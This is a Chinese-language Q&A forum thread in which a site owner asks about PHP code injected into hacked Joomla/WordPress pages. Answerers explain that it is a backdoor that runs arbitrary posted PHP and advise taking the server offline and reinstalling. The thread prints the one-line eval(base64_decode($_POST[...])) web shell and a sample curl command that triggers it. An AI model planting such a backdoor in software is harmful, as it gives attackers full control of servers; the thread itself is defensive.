2014-05-12 46 views
0

很抱歉,如果這是錯誤的地方問這個問題,但我不知道下面的代碼會做什麼。我經常看到這種代碼。我不知道這段代碼做什麼。在黑客入侵網站後,黑客通常會在joomla和wordpress網站的許多頁面中注入這種代碼。如果任何人都可以解釋代碼,那麼我將會成爲gald。base64_decode注入代碼在PHP文件

<?php eval(base64_decode($_POST['na7fe23']));?> 

回答

2

如果有人張貼在該領域「na7fe23」這個腳本PHP代碼塊,那麼發佈的代碼將您的服務器上執行。

這基本上允許任何人在你的服務器上執行任何PHP腳本,所以你是嚴重受損。

+0

那麼我在哪裏可以找到這個na7fe23。是否有任何方法可以刪除這些代碼和/或掃描程序? – Err0rr

+3

這na7fe23只是一個隨機場。有人會在他們的命令行中執行'cUrl http://example.com/yourscript.php'POST'-d na7fe23 = BIGCHUNKOFBASE64ENCODEDPHPCODE'或類似的東西,然後就搞砸了。沒有辦法檢查代碼是什麼。此外,您無法知道服務器上的其他後門程序是否已創建。我現在要從互聯網上拔掉它,基本上重新安裝它,然後再將它插回去。根據Web服務器用戶的權限,該服務器上的所有內容以及可能在網絡的其餘部分可能都有危險。 – GolezTrol

+0

我已經擰了。無論如何感謝信息。我真的很感激。再次感謝 :) – Err0rr